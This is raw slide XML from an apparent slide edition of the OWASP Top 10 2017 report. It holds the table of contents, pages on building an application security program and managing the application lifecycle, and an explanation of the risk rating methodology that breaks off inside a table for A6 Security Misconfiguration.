                      </a:b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Risks – 2017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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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17" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>6</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A1:2017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Injection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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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18" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>7</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A2:2017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Broken Authentication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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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19" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>8</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A3:2017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Sensitive Data Exposure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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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20" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>9</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A4:2017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XML External Entities (XXE)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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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21" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>10</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A5:2017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Broken Access Control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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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22" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>11</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A6:2017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Security Misconfiguration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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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23" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>12</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A7:2017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Cross-Site Scripting (XSS) 	….…………</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="mr-IN"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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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24" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>13</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A8:2017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Insecure Deserialization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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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25" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>14</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A9:2017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Using Components with Known</a:t>
                      </a:r>
                      <a:b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Vulnerabilities .……………………………</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="mr-IN"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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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26" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>15</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A10:2017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baseline="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Insufficient Logging &amp; Monitoring	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="1200" baseline="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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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27" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>16</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What’s Next for Developers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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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28" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>17</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What’s Next for Security Testers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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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29" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>18</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What’s Next for Organizations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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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30" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>19</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What’s Next for Application Managers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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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31" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>20</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9"/>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Note About Risks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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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32" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>21</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+RF</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Details About Risk Factors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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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33" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>22</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+DAT</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Methodology and Data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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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34" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>23</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+ACK</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Acknowledgements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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>24</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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="480249922"/>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5543">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Start</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Your Application Security Program Now</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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17857">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Applica</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950"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tion security is no longer optional. Between increasing attacks and regulatory pressures, organizations must establish effective processes and capabilities for securing their applications and APIs. Given the staggering amount of code in the numerous applications and APIs already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in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities. </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eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="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OWASP recommends organizations establish an application security program to gain insight and improve security across their applications and APIs. Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, business, and executive management. Security should be visible and measurable, so that all the different players can see and understand the organization’s application security posture. Focus on the activities and outcomes that actually help improve enterprise security by eliminating or reducing risk.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hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP SAMM</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and the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hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Guide for CISOs</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is the source of most of the key activities in this list.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="950" baseline="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a:t>+O</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>What’s Next for Organizations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 1"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2936556164"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-914400" y="2951820"/>
          <a:ext cx="8686800" cy="6096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 name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3F9A383-1D7C-437C-BD6E-2E22B4AF47C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="40132" y="8172400"/>
            <a:ext cx="1215135" cy="528606"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="444500">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pP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Provide Management Visibility</a:t>
            </a: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3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="778839748"/>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5366">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Manage the Full Application Lifecycle</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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18034">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="95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Applications belong to the most complex systems humans regularly create and maintain. IT management for an application should be performed by IT specialists who are responsible for the overall IT lifecycle of an application. We suggest establishing the role of application manager as </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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technical counterpart to the application owner. The application manager is in charge of the whole</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" kern="1200" baseline="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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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application lifecycle from the IT perspective, from collecting the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" kern="1200" baseline="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requirements until the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-A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process of retiring systems, which is often overlooked. </a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE"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pPr>
                      <a:br>
                        <a:rPr lang="en-US" sz="90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br>
                      <a:endParaRPr lang="en-AU" sz="90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a:t>+A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>What’s Next for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Managers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2812331470"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2141730"/>
          <a:ext cx="6858000" cy="693077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698158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2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2886854699"/>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5543">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>It’s About the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> Risks that Weaknesses Represent</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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17857">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The Risk Rating methodology for the Top 10 is based on the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4"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</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For each Top 10 category, we estimated the typical risk that each weakness introduces to a typical web application by looking at common likelihood factors and impact factors for each common weakness. We then ordered the Top 10 according to those weaknesses that typically introduce the most significant risk to an application. These factors get updated with each new Top 10 release as things change and evolve.</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dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> defines numerous factors to help calculate</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> the risk of an identified vulnerability. However, the Top 10 must talk about generalities, rather than specific vulnerabilities in real applications and APIs. Consequently, we can never be as precise as application owners or managers when calculating risks for their application(s). You are best equipped to judge the importance of your applications and data, what your threats are, and how your system has been built and is being operated.</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Our methodology includes three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likelihood factors for each</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weakness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prevalence</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detectability,</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and ease of exploit</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and one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impact factor (technical impact). </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The risk scales for each factor range from 1-Low to 3-High with terminology specific for each factor.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The prevalence of a weakness is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a factor that you typically don’t have to calculate. For prevalence data, we have been supplied prevalence statistics from a number of different organizations (as referenced in the Acknowledgements on page 25), and we have aggregated their data together to come up with a Top 10 likelihood of existence list by prevalence. This data was then combined with the other two likelihood factors (detectability and ease of exploit) to calculate a likelihood rating for each weakness. The likelihood rating was then multiplied by our estimated average technical impact for each item to come up with an overall risk ranking for each item in the </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Top 10 (the higher the result the higher the risk).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Detectability, Ease of Exploit, and Impact were calculated from analyzing reported CVEs that were associated with each of the Top 10 categories. </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b="1" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Note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This approach does not take the likelihood of the threat agent into account. Nor does it account for any of the various technical details associated with your particular application. Any of these factors could significantly affect the overall likelihood of an attacker finding and exploiting a particular vulnerability. This rating does not take into account the actual impact on your business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="none"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u="sng" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Your organization</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will have to decide how much security risk from applications and APIs </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="sng" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>the organization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="none"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is willing to accept given your culture, industry, and regulatory environment. The purpose of the OWASP Top 10 is not to do this risk analysis for you.</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The following illustrates our calculation of the risk for </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="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A6:2017-Security Misconfiguration</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5" name="Table 8"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="290321481"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="121920" y="5775521"/>
          <a:ext cx="6629400" cy="2783878"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="667815">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525258">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1"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a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>EASY: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1"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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
